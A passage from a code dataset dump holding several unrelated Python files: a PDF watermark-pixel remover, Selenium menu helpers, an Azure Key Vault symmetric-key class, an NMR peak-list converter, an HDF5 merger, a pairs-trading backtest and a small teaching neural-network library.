"line_number": 14, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 14, "usage_type": "attribute"}, {"api_name": "utils.create_uniform_grid", "line_number": 22, "usage_type": "call"}, {"api_name": "xarray.Dataset", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "advtraj.utils.grid.wrap_periodic_grid_coords", "line_number": 59, "usage_type": "call"}, {"api_name": "advtraj.utils.grid", "line_number": 59, "usage_type": "name"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 66, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 17, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 17, "usage_type": "attribute"}]} +{"seq_id": "596864026", "text": "import os\nimport PIL\nimport pdf2image\nfrom tqdm import tqdm\nfrom collections import defaultdict\n\n# dots per inch (dpi) adjusts quality and file size\nimages = pdf2image.convert_from_path('files/lurie.pdf', dpi = 300)\n\ndef find_watermark_colors(im):\n\n im_width, im_height = im.size\n pixels = im.load()\n\n colors_to_freq = defaultdict(int)\n\n for y in range(im_height):\n\n line_pixels = set()\n\n contains_black = False\n\n for x in range(im_width):\n\n current_pixel = im.getpixel((x, y))\n\n if current_pixel == (0, 0, 0):\n contains_black = True\n break\n else:\n line_pixels.add(current_pixel)\n\n if not contains_black:\n no_white = line_pixels - set([(255, 255, 255)])\n\n if no_white:\n colors_to_freq[tuple(list(no_white))] += 1\n\n watermark_colors = set(list(sorted(colors_to_freq, key = colors_to_freq.get, reverse = True)[0]))\n\n return(watermark_colors)\n\nwatermark_colors = find_watermark_colors(images[0])\n\nfor im in tqdm(images, desc = \"Images: \"):\n\n im_width, im_height = im.size\n pixels = im.load()\n\n for y in range(im_height):\n\n for x in range(im_width):\n\n if im.getpixel((x, y)) in watermark_colors:\n pixels[x, y] = (255, 255, 255)\n\nimages[0].save(\"files/out.pdf\", save_all = True, append_images = images[1:], subsampling=0, quality=100)\n", "sub_path": "remove.py", "file_name": "remove.py", "file_ext": "py", "file_size_in_byte": 1433, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pdf2image.convert_from_path", "line_number": 8, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 15, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "393220530", "text": "from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.support.wait import WebDriverWait\nimport time\n\n\ndef clr_declaration_search(driver):\n time.sleep(1)\n driver.find_element_by_xpath(\".//*[@id='msg10135']/a/span[2]\").click()\n # Select menu: Clearance -> Declaration\n\ndef clr_declaration_simple(driver):\n time.sleep(1)\n locator = (By.XPATH, \".//*[@id='msg10136']\")\n WebDriverWait(driver, 10, 0.1).until(ec.element_to_be_clickable(locator))\n # driver.implicitly_wait(30)\n driver.find_element_by_xpath(\".//*[@id='msg10136']\").click()\n # Select menu: Clearance -> Declaration -> Capture a simple SAD\n\n\ndef clr_loader_upload(driver):\n time.sleep(1)\n driver.find_element_by_xpath(\".//*[@id='msg11168']/a/span[2]\").click()\n\n\n", "sub_path": "DirectTax/CLR/clr_submenu.py", "file_name": "clr_submenu.py", "file_ext": "py", "file_size_in_byte": 830, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "time.sleep", "line_number": 8, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 14, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 14, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.wait.WebDriverWait", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 15, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "641923258", "text": "# ------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------\nimport uuid\nimport os\nfrom .key import Key\nfrom .algorithms.aes_cbc import Aes256Cbc, Aes192Cbc, Aes128Cbc\nfrom .algorithms.aes_cbc_hmac import Aes256CbcHmacSha512, Aes192CbcHmacSha384, Aes128CbcHmacSha256\nfrom .algorithms.aes_kw import AesKw256, AesKw192, AesKw128\n\nkey_size_128 = 128 >> 3\nkey_size_192 = 192 >> 3\nkey_size_256 = 256 >> 3\nkey_size_384 = 384 >> 3\nkey_size_512 = 512 >> 3\n\n_default_key_size = key_size_256\n\n_supported_key_sizes = [key_size_128, key_size_192, key_size_256, key_size_384, key_size_512]\n\n_default_enc_alg_by_size = {\n key_size_128: Aes128Cbc.name(),\n key_size_192: Aes192Cbc.name(),\n key_size_256: Aes128CbcHmacSha256.name(),\n key_size_384: Aes192CbcHmacSha384.name(),\n key_size_512: Aes256CbcHmacSha512.name(),\n}\n\n_default_kw_alg_by_size = {\n key_size_128: AesKw128.name(),\n key_size_192: AesKw192.name(),\n key_size_256: AesKw256.name(),\n key_size_384: AesKw256.name(),\n key_size_512: AesKw256.name(),\n}\n\n\nclass SymmetricKey(Key):\n def __init__(self, kid=None, key_bytes=None, key_size=None):\n super(SymmetricKey, self).__init__()\n\n self._kid = kid or str(uuid.uuid4())\n\n if not key_bytes:\n key_size = key_size or _default_key_size\n\n if key_size not in _supported_key_sizes:\n raise ValueError(\"The key size must be 128, 192, 256, 384 or 512 bits of data\")\n\n key_bytes = os.urandom(key_size)\n\n if len(key_bytes) not in _supported_key_sizes:\n raise ValueError(\"The key size must be 128, 192, 256, 384 or 512 bits of data\")\n\n self._key = key_bytes\n\n def is_private_key(self):\n return True\n\n @classmethod\n def from_jwk(cls, jwk):\n return cls(kid=jwk.kid, key_bytes=jwk.k)\n\n @property\n def kid(self):\n return self._kid\n\n @property\n def default_encryption_algorithm(self):\n return _default_enc_alg_by_size[len(self._key)]\n\n @property\n def default_key_wrap_algorithm(self):\n return _default_kw_alg_by_size[len(self._key)]\n\n @property\n def supported_encryption_algorithms(self):\n supported = []\n key_size = len(self._key)\n\n if key_size >= key_size_128:\n supported.append(Aes128Cbc.name())\n if key_size >= key_size_192:\n supported.append(Aes192Cbc.name())\n if key_size >= key_size_256:\n supported.append(Aes256Cbc.name())\n supported.append(Aes128CbcHmacSha256.name())\n if key_size >= key_size_384:\n supported.append(Aes192CbcHmacSha384.name())\n if key_size >= key_size_512:\n supported.append(Aes256CbcHmacSha512.name())\n\n return supported\n\n @property\n def supported_key_wrap_algorithms(self):\n supported = []\n key_size = len(self._key)\n\n if key_size >= key_size_128:\n supported.append(AesKw128.name())\n if key_size >= key_size_192:\n supported.append(AesKw192.name())\n if key_size >= key_size_256:\n supported.append(AesKw256.name())\n\n return supported\n\n def encrypt(self, plain_text, iv, **kwargs): # pylint:disable=arguments-differ\n algorithm = self._get_algorithm(\"encrypt\", **kwargs)\n encryptor = algorithm.create_encryptor(key=self._key, iv=iv)\n return encryptor.transform(plain_text, **kwargs)\n\n def decrypt(self, cipher_text, iv, **kwargs): # pylint:disable=arguments-differ\n algorithm = self._get_algorithm(\"decrypt\", **kwargs)\n decryptor = algorithm.create_decryptor(key=self._key, iv=iv)\n return decryptor.transform(cipher_text, **kwargs)\n\n def wrap_key(self, key, **kwargs):\n algorithm = self._get_algorithm(\"wrapKey\", **kwargs)\n encryptor = algorithm.create_encryptor(key=self._key)\n return encryptor.transform(key)\n\n def unwrap_key(self, encrypted_key, **kwargs):\n algorithm = self._get_algorithm(\"unwrapKey\", **kwargs)\n decryptor = algorithm.create_decryptor(key=self._key)\n return decryptor.transform(encrypted_key)\n\n def sign(self, digest, **kwargs):\n raise NotImplementedError()\n\n def verify(self, digest, signature, **kwargs):\n raise NotImplementedError()\n", "sub_path": "sdk/keyvault/azure-keyvault-keys/azure/keyvault/keys/crypto/_internal/symmetric_key.py", "file_name": "symmetric_key.py", "file_ext": "py", "file_size_in_byte": 4360, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "algorithms.aes_cbc.Aes128Cbc.name", "line_number": 23, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc.Aes128Cbc", "line_number": 23, "usage_type": "name"}, {"api_name": "algorithms.aes_cbc.Aes192Cbc.name", "line_number": 24, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc.Aes192Cbc", "line_number": 24, "usage_type": "name"}, {"api_name": "algorithms.aes_cbc_hmac.Aes128CbcHmacSha256.name", "line_number": 25, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc_hmac.Aes128CbcHmacSha256", "line_number": 25, "usage_type": "name"}, {"api_name": "algorithms.aes_cbc_hmac.Aes192CbcHmacSha384.name", "line_number": 26, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc_hmac.Aes192CbcHmacSha384", "line_number": 26, "usage_type": "name"}, {"api_name": "algorithms.aes_cbc_hmac.Aes256CbcHmacSha512.name", "line_number": 27, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc_hmac.Aes256CbcHmacSha512", "line_number": 27, "usage_type": "name"}, {"api_name": "algorithms.aes_kw.AesKw128.name", "line_number": 31, "usage_type": "call"}, {"api_name": "algorithms.aes_kw.AesKw128", "line_number": 31, "usage_type": "name"}, {"api_name": "algorithms.aes_kw.AesKw192.name", "line_number": 32, "usage_type": "call"}, {"api_name": "algorithms.aes_kw.AesKw192", "line_number": 32, "usage_type": "name"}, {"api_name": "algorithms.aes_kw.AesKw256.name", "line_number": 33, "usage_type": "call"}, {"api_name": "algorithms.aes_kw.AesKw256", "line_number": 33, "usage_type": "name"}, {"api_name": "algorithms.aes_kw.AesKw256.name", "line_number": 34, "usage_type": "call"}, {"api_name": "algorithms.aes_kw.AesKw256", "line_number": 34, "usage_type": "name"}, {"api_name": "algorithms.aes_kw.AesKw256.name", "line_number": 35, "usage_type": "call"}, {"api_name": "algorithms.aes_kw.AesKw256", "line_number": 35, "usage_type": "name"}, {"api_name": "key.Key", "line_number": 39, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 43, "usage_type": "call"}, {"api_name": "os.urandom", "line_number": 51, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc.Aes128Cbc.name", "line_number": 83, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc.Aes128Cbc", "line_number": 83, "usage_type": "name"}, {"api_name": "algorithms.aes_cbc.Aes192Cbc.name", "line_number": 85, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc.Aes192Cbc", "line_number": 85, "usage_type": "name"}, {"api_name": "algorithms.aes_cbc.Aes256Cbc.name", "line_number": 87, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc.Aes256Cbc", "line_number": 87, "usage_type": "name"}, {"api_name": "algorithms.aes_cbc_hmac.Aes128CbcHmacSha256.name", "line_number": 88, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc_hmac.Aes128CbcHmacSha256", "line_number": 88, "usage_type": "name"}, {"api_name": "algorithms.aes_cbc_hmac.Aes192CbcHmacSha384.name", "line_number": 90, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc_hmac.Aes192CbcHmacSha384", "line_number": 90, "usage_type": "name"}, {"api_name": "algorithms.aes_cbc_hmac.Aes256CbcHmacSha512.name", "line_number": 92, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc_hmac.Aes256CbcHmacSha512", "line_number": 92, "usage_type": "name"}, {"api_name": "algorithms.aes_kw.AesKw128.name", "line_number": 102, "usage_type": "call"}, {"api_name": "algorithms.aes_kw.AesKw128", "line_number": 102, "usage_type": "name"}, {"api_name": "algorithms.aes_kw.AesKw192.name", "line_number": 104, "usage_type": "call"}, {"api_name": "algorithms.aes_kw.AesKw192", "line_number": 104, "usage_type": "name"}, {"api_name": "algorithms.aes_kw.AesKw256.name", "line_number": 106, "usage_type": "call"}, {"api_name": "algorithms.aes_kw.AesKw256", "line_number": 106, "usage_type": "name"}]} +{"seq_id": "559137578", "text": "#!/usr/bin/python\n\nimport os, sys\nimport argparse as ap\npl_path = os.path.expanduser(\"~bharden1/scripts/lib/python/peaklists\")\nsys.path.append(pl_path)\nimport peaklists as pl\n\ndescription = \"\"\"\nlinks2tab.py will convert a 3D or 4D CARA strip peak list into an\nnmrPipe tab file. It will also add the appropriate columns to fit each\npeak to an N-dimensional Gaussian using nlinLS.\n\\n\\n\nEach strip peak list should correspond to a particular NOESY spectrum.\nThe script needs access to the header of the NOESY spectrum to correctly\ncalculate the location of each peak in units of points. Thus, the two\nrequired arguments for the conversion are the strip peak list and its\ncorresponding nmrPipe spectrum. The spectrum can be either a monolithic\nfile or the first plane from a series. DO NOT USE A .PIPE FILE HERE.\nOnly use a .ft* file.\n\\n\\n\nThe order of the columns in the strip peak list may not match the order\nof dimensions in the corresponding spectrum. Use the option --order to\nspecify which column (from left to right) corresponds to which dimension\n(XYZA) in the nmrPipe spectrum. The default is XYZ.\n\\n\\n\nUse the --cal option to enter the calibration for each dimension. The\norder here should match the order of dimensions in the strip peak list.\nThese values should be the same as the calibration values in CARA.\n\\n\\n\nFinally, a strip peak list does not contain assignment data directly.\nIt only provides the spin ID numbers from CARA. If you supply a seq file\nand a prot file from CARA using the --seq and --prot options, the script\ncan resolve the spin IDs into their actual residues and atom names. It\nis highly recommended that you supply a prot file. Without it, you will\nfind that it is extremely difficult to identify peaks in the tab file.\n\"\"\"\nparser = ap.ArgumentParser(description=description,\n formatter_class=ap.RawDescriptionHelpFormatter)\nrequired = parser.add_argument_group('required arguments')\nrequired.add_argument('--ft', dest='ft_file', metavar='test.ft*',\n type=str, required=True,\n help='nmrPipe spectrum or plane (NOT .pipe file)')\nrequired.add_argument('--in', dest='peak_file', metavar='links.peaks',\n type=str, required=True, help='strip peaklist')\nparser.add_argument('--seq', dest='seq_file', metavar='protein.seq',\n type=str, default=None, help='seq file')\nparser.add_argument('--prot', dest='prot_file', metavar='atoms.prot',\n type=str, default=None, help='prot file')\nparser.add_argument('--out', dest='tab_file', metavar='links.tab',\n type=str, default='links.tab',\n help='nlinLS tab file (default links.tab)')\nparser.add_argument('--order', dest='dim_order', metavar='ORDER', type=str,\n help='correspondence between peak list columns (left to ' +\n 'right) and spectrum dimensions (XYZA), default XYZ')\nparser.add_argument('--cal', dest='cal', metavar='C', nargs='*',\n type=float, help='calibration for each dimension (PPM)')\n\nVOLUME = (('volume', ('VOL', '%11.4e')), )\nNDGAUSSIAN = (('height', ('HEIGHT', '%11.4e')), ('widths', ('%sW', '%5.2f')))\nVOLUME_GAUSSIAN = VOLUME + NDGAUSSIAN\n\nargs = parser.parse_args()\npeaklist = pl.read_peaks_file(args.peak_file, tab_dict=VOLUME_GAUSSIAN,\n spectrum=args.ft_file, seq_file=args.seq_file,\n atom_list=args.prot_file)\npeaklist.clear_peak_indices()\npeaklist.set_peak_defaults(volume=0.0, height=5e7, widths=[3.0]*peaklist.dims)\nif args.cal is not None:\n peaklist.calibrate(args.cal)\nif args.dim_order is not None:\n peaklist.dim_order = args.dim_order\nif args.prot_file is not None:\n peaklist.sort_by_assignments()\npeaklist.write_tab_file(args.tab_file, remark='Converted with links2tab.py')\n", "sub_path": "examples/links2tab.py", "file_name": "links2tab.py", "file_ext": "py", "file_size_in_byte": 3865, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.path.expanduser", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 38, "usage_type": "call"}, {"api_name": "argparse.RawDescriptionHelpFormatter", "line_number": 39, "usage_type": "attribute"}, {"api_name": "peaklists.read_peaks_file", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "231994884", "text": "#!/usr/bin/env python\nimport numpy as np\nimport h5py\nimport argparse\n\n# Assume all arrays are same dimensions\n\nparser = argparse.ArgumentParser(description='merge hdf5 files')\nparser.add_argument('-files', required=True, type=str, nargs='+')\nparser.add_argument('-out', required=True, type=str, help='output file name')\nparser.add_argument('--stackaxis', default=1, type=int, help='Axis choosen to stack reads in output dataset for HDF5 file.')\n\nargs = parser.parse_args()\n\nout = args.out\nif not out.endswith('.h5'):\n out += '.h5'\n\nmats = []\nfor f in args.files:\n fi = h5py.File(f, 'r')\n mats.append(fi['reads'][:]) \n fi.close()\nM = np.stack(mats, args.stackaxis)\n\nf = h5py.File(out, 'w')\nf.create_dataset('reads', M.shape, data=M, dtype='i', compression='gzip', compression_opts=9)\nf.close()", "sub_path": "python-array-utils/src/merge_hdf5.py", "file_name": "merge_hdf5.py", "file_ext": "py", "file_size_in_byte": 807, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 8, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 24, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "482652361", "text": "from johansen_test import coint_johansen\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom functions import *\r\nfrom numpy.matlib import repmat\r\nimport numpy as np\r\n\r\n# Implementation of the second part of example 3.1 in Ernest Chang's \r\n# book Algorithmic trading : winning strategies and their rationale.\r\n#\r\n# log(Price) Spread\r\n\r\nif __name__ == \"__main__\":\r\n \r\n #import data from CSV file\r\n root_path = 'C:/Users/javgar119/Documents/Python/Data/'\r\n # the paths\r\n # MAC: '/Users/Javi/Documents/MarketData/'\r\n # WIN: 'C:/Users/javgar119/Documents/Python/Data'\r\n filename = 'GLD_USO_daily2.csv'\r\n full_path = root_path + filename\r\n data = pd.read_csv(full_path, index_col='Date')\r\n \r\n y_ticket = 'USO'\r\n x_ticket = 'GLD'\r\n \r\n y = data[y_ticket]\r\n x = data[x_ticket]\r\n \r\n\r\n # lookback period for calculating the dynamically changing\r\n lookback = 20\r\n modelo = pd.ols(y=np.log(y), x=np.log(x), window_type='rolling', window=lookback)\r\n data = data[lookback-1:]\r\n betas = modelo.beta\r\n \r\n # calculate the number of units for the strategy in the form\r\n # y-beta*x\r\n yport = pd.DataFrame(np.log(data[y_ticket]) - (betas['x'] * np.log(data[x_ticket])))\r\n \r\n moving_mean = pd.rolling_mean(yport, window=lookback)\r\n moving_std = pd.rolling_std(yport,window=lookback)\r\n # the number of units of the syntetic portfolio is given by the\r\n # negative value of z-score\r\n numunits = pd.DataFrame(-(yport - moving_mean) / moving_std)\r\n\r\n # compute the $ position for each asset\r\n AA = pd.DataFrame(repmat(numunits,1,2))\r\n BB = pd.DataFrame(-betas['x'])\r\n BB['ones'] = np.ones((len(betas)))\r\n position = multiply(multiply(AA, BB), data)\r\n\r\n # compute the daily pnl in $$\r\n pnl = sum(multiply(position[:-1], divide(diff(data,axis = 0), data[:-1])),1)\r\n \r\n \r\n # gross market value of portfolio\r\n mrk_val = pd.DataFrame.sum(abs(position), axis=1)\r\n mrk_val = mrk_val[:-1]\r\n \r\n # return is P&L divided by gross market value of portfolio\r\n rtn = pnl / mrk_val\r\n \r\n # compute performance statistics\r\n sharpe = (np.sqrt(252)*np.mean(rtn)) / np.std(rtn)\r\n APR = np.prod(1+rtn)**(252/len(rtn))-1\r\n \r\n ##################################################\r\n # print the results\r\n ##################################################\r\n print('Price spread Sharpe: {:.4}'.format(sharpe))\r\n print('Price Spread APR: {:.4%}'.format(APR))\r\n \r\n \r\n #*************************************************\r\n # plotting the chart\r\n #************************************************* \r\n #plot of numunits\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n ax.plot(cumsum(rtn))\r\n ax.set_title('{}-{} log(Price) Spread Acum Return'.format(x_ticket, y_ticket))\r\n ax.set_xlabel('Data points')\r\n ax.set_ylabel('acumm rtn')\r\n ax.text(1000, 0, 'Sharpe: {:.4}'.format(sharpe))\r\n ax.text(1000, -0.03, 'APR: {:.4%}'.format(APR))\r\n \r\n \r\n \r\n plt.show()", "sub_path": "EChanBook2/example_3_1_b.py", "file_name": "example_3_1_b.py", "file_ext": "py", "file_size_in_byte": 3028, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.ols", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.rolling_std", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.matlib.repmat", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.DataFrame.sum", "line_number": 58, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}]} +{"seq_id": "234130693", "text": "#< ---- 20 char ---->< ---- 20 char --->< ---- 20 char --->< ---- 20 char --->\n# \n# MiniNN is a simple neural network library crafted by Forrest Sheng Bao \n# at Iowa State University for students to hack to understand NNs. \n# MiniNN is deveoped because the source code of scikit-learn.neural_network \n# or Flux was too long to study and not easy to hack. Not to mention the\n# complexity of source code of Tensorflow or PyTorch for teaching intro to ML.\n# With MiniNN, students can easily see gradients on all weights between \n# layers during training and visualize every layer, and tweak around.\n\n# Under 200 lines, it covers all core operations of NNs: \n# feedforward, backpropagation, and gradient descent. \n# To be mini and simple, it supports only logistic/sigmoid activation,\n# cross entropy loss, and updating the NN with one sample each time. \n# Preinitialized transfer/weight matrixes are needed to intialize the network. \n\n# Feel free to use it in your teaching or playing. \n# Licensed under BSD 3-clause \n# Copyright 2020 Forrest Sheng Bao\n# Contact him for any suggestions or questions: forrest dot bao aT Gmail \n# Opinions expressed here do not reflect those of Iowa State University\n\nimport numpy \nimport numpy.random\nfrom sklearn.utils import gen_batches\nfrom sklearn.datasets import make_classification\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nnumpy.set_printoptions(precision=3, floatmode=\"fixed\")\n\nclass MiniNN: \n \"\"\"\n\n Naming convention: Any self variable starting with a capitalized letter and ending with s is a list of 1-D or 2-D numpy arrays, each element of which is about one layer, such as weights from one layer to its next layer. \n\n self.Ws: list of 2-D numpy arrays, tranfer matrixes of all layers, ordered in feedforward sequence \n self.phi: activation function \n self.psi: derivative of activation function, in terms of its OUTPUT, ONLY when phi is logistic \n self.Xs: list of 2-D numpy arrays, output from each layer\n self.Deltas: list of 2-D numpy arrays, delta from each layer\n\n \"\"\"\n def logistic(self, x):\n return 1/(1 + numpy.exp(-x)) \n\n def logistic_psi(self, x):\n \"\"\"If the output of a logistic function is x, then the derivative of x over \n the input is x * (1-x)\n \"\"\"\n return x * (1-x)\n\n def __init__(self, hidden_layer=[5], L2=False, lambd=0.01, batch_size=1, seed=1):\n \"\"\"Initialize an NN\n\n hidden_layer: does not include bias\n \"\"\"\n # replace Ws by hidden_layer\n self.hidden_layer = hidden_layer # hidden layers\n self.L = len(hidden_layer) + 1 # number of transfer matrix\n self.phi = self.logistic # same activation function for all neurons\n self.psi = self.logistic_psi\n self.L2 = L2 # L2 regularization\n self.lambd = lambd # hyperparameter of L2 regularization\n self.batch = batch_size # size of batch\n self.seed = seed # seed of random matrix\n\n def feedforward(self, x, W, phi):\n \"\"\"feedforward from previou layer output x to next layer via W and Phi\n return an augmented out where the first element is 1, the bias \n\n Note the augmented 1 is redundant when the forwarded layer is output. \n\n x: 1-D numpy array, augmented input\n W: 2-D numpy array, transfer matrix\n phi: a function name, activation function\n \"\"\"\n\n return numpy.concatenate(([1], # augment the bias 1\n phi(\n numpy.matmul( W.transpose(), x ) \n ) # end of phi\n )) # end of concatenate\n\n def predict(self, X_0):\n \"\"\"make prediction, and log the output of all neurons for backpropagation later \n\n X_0: 1-D numpy array, the input vector, AUGMENTED\n \"\"\"\n Xs = [X_0]; X=X_0\n for W in self.Ws:\n X = self.feedforward(X, W, self.phi)\n Xs.append(X)\n self.Xs = Xs\n self.oracle = X[1:] # it is safe because Python preserves variables used in for-loops\n\n def backpropagate(self, delta_next, W_now, psi, x_now):\n \"\"\"make on step of backpropagation \n\n delta_next: delta at the next layer, INCLUDING that on bias term \n (next means layer index increase by 1; \n backpropagation is from next layer to current/now layer)\n W_now: transfer matrix from current layer to next layer (e.g., from layer l to layer l+1)\n psi: derivative of activation function in terms of the activation, not the input of activation function\n x_now: output of current layer \n \"\"\"\n delta_next = delta_next[1:] # drop the derivative of error on bias term \n\n # first propagate error to the output of previou layer\n delta_now = numpy.matmul(W_now, delta_next) # transfer backward\n # then propagate thru the activation function at previous layer \n delta_now *= self.psi(x_now) \n # hadamard product This ONLY works when activation function is logistic\n return delta_now\n\n def get_deltas(self, target):\n \"\"\"Produce deltas at every layer \n\n target: 1-D numpy array, the target of a sample \n delta : 1-D numpy array, delta at current layer\n \"\"\"\n delta = self.oracle - target # delta at output layer is prediction minus target \n # only when activation function is logistic \n delta = numpy.concatenate(([0], delta)) # artificially prepend the delta on bias to match that in non-output layers. \n self.Deltas = [delta] # log delta's at all layers\n\n for l in range(len(self.Ws)-1, -1, -1): # propagate error backwardly \n # technically, no need to loop to l=0 the input layer. But we do it anyway\n # l is the layer index \n W, X = self.Ws[l], self.Xs[l]\n delta = self.backpropagate(delta, W, self.psi, X)\n self.Deltas.insert(0, delta) # prepend, because BACK-propagate\n\n def get_gradient(self):\n \"\"\" Given a sequence of Deltas and a sequence of Xs, compute the gradient of error on each transform matrix and update it using gradient descent\n\n Note that the first element on each delta is on the bias term. It should not be involved in computing the gradient on any weight because the bias term is not connected with previous layer.\n \"\"\"\n\n # get the gradient of each sample in batch then accumulate the gradient\n for l in range(self.L): # l is layer index\n x = self.Xs[l]\n delta = self.Deltas[l + 1]\n # print (l, x, delta)\n gradient = numpy.outer(x, delta[1:])\n self.gradient[l] += gradient / self.batch\n\n # check the correct rate of NN\n\n def test(self, x, y):\n score = 0\n # print(\"test:\")\n for i in range(len(x)):\n self.predict(x[i])\n predict = self.oracle\n # print(predict, y[i])\n index = numpy.argmax(predict)\n if y[i][index] == 1:\n score += 1\n print(score / len(x))\n\n def train(self, x, y, max_iter=100):\n \"\"\"feedforward, backpropagation, and update weights\n The train function updates an NN using one sample. \n Unlike scikit-learn or Tensorflow's fit(), x and y here are not a bunch of samples. \n\n Homework: Turn this into a loop that we use a batch of samples to update the NN. \n\n x: 1-D numpy array, an input vector\n y: 1-D numpy array, the target\n\n \"\"\"\n\n # determine the input layer size and output layer size accroding to x and y\n if len(x.shape) == 1:\n lenx = len(x) - 1\n leny = len(y)\n sample_count = 1\n else:\n lenx = x.shape[1] - 1\n leny = y.shape[1]\n sample_count = len(x)\n\n self.sample_count = sample_count\n self.hidden_layer.append(leny)\n self.hidden_layer.insert(0, lenx) # insert input layer and output layer\n\n # initialize transfer matrix, use random matrix to form\n Ws = []\n numpy.random.seed(self.seed)\n for i in range(self.L):\n Wi = numpy.random.random((self.hidden_layer[i] + 1, self.hidden_layer[i + 1]))\n Ws.append(2 * Wi - 1)\n self.Ws = Ws\n # print(Ws)\n\n for epoch in range(max_iter):\n # print (\"epoch\", epoch, end=\":\")\n for slice in gen_batches(sample_count, self.batch):\n # print(slice)\n x_batch = x[slice] # slice the samples and labels to the same size\n y_batch = y[slice]\n self.gradient = [0] * self.L\n for k, xx in enumerate(x_batch):\n self.predict(xx) # forward\n # print(self.oracle, y_batch[k])\n self.get_deltas(y_batch[k]) # backpropagate\n self.get_gradient() # get batch gradient\n for l in range(self.L):\n p = 1 # learning rate\n if self.L2: # L2 regularization\n self.Ws[l] = (1 - p * self.lambd) * self.Ws[l] - p * self.gradient[l]\n else:\n self.Ws[l] -= p * self.gradient[l] # batch gradient descent\n\nif __name__ == \"__main__\":\n\n # this part use mak_classification to create samples for the test. the sample size 100, 2 classes.\n n = 2\n x, y = make_classification(n_samples=1000, n_features=2, n_informative=n, n_classes=n, n_redundant=0)\n bias = numpy.ones((len(x), 1))\n x_0 = numpy.hstack((bias, x))\n y_0 = numpy.zeros((len(y), n))\n for i in range(len(y)):\n y_0[i][y[i]] = 1\n\n # slpit samples into train and test\n x_train, x_test, y_train, y_test = train_test_split(x_0, y_0, test_size=0.2, random_state=1)\n\n hidden = [8]\n MNN = MiniNN(hidden_layer=hidden, L2=False, 